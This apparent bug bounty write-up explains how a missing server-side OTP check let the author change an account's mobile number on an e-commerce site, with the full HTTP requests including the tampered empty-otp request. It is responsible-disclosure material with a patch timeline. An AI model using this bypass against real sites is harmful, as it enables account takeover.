How I bypassed OTP mechanism used for updating Sensitive Information

I found this vulnerability in a ecommerce site, the site has a responsible disclosure program

So the vulnerability was in profile updation page, there was a form by which a user can update his/her details, the details also includes Mobile Number, when a user tried to update any other detail it was updated normally but when user click on Edit button at Mobile Number field, OTP is sent to the registered email, and a popup occurs asking for the OTP, after entering OTP the number field can be enabled and updated

OTP Validation Request

POST /customer/otp-val HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 85
Connection: close
Cookie: --COOKIES--

otp=123456&type=profile_update_otp&formId=myAccountVerifyOTPForm&mobile_no=NUMBERHERE

Data Updation Request

POST /customer/account HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 222
Connection: close
Cookie: --COOKIES--
Upgrade-Insecure-Requests: 1

csrf_token=--CSRFTOKEN--&save_profile=Save+Changes&otp=123456&fname=Test&lname=Test&mobile=NUMBERHERE

Where is the problem in this flow

There is two different requests one is validating the OTP, and enabling the number field, and another is when actually after updating the number a request is sent with Save button to save the number on the server

There is otp parameter in both the requests but the application is completely dependent on the first request, and in the second request the otp parameter is not validated

Exploitation

As mentioned earlier that if user try to update any other field the data updation request is sent which also contains Mobile Number

So I clicked on edit Name and intercepted the request with burp suite, changed the mobile parameter with whatever number and send the request

Malicious Requests //Empty otp parameter

POST /customer/account HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 222
Connection: close
Cookie: --COOKIES--
Upgrade-Insecure-Requests: 1

csrf_token=--CSRFTOKEN--&save_profile=Save+Changes&otp=&fname=Test&lname=Test&mobile=NUMBERHERE

The Mobile number is updated without any validation

The vulneraility is now patched

Time Frame

Intial Report: 27-May-2020

First Response: 27-May-2020

Patch Released: 2-June-2020

Related Post

One thought on “How I bypassed OTP mechanism used for updating Sensitive Information

Leave a Reply

Your email address will not be published. Required fields are marked *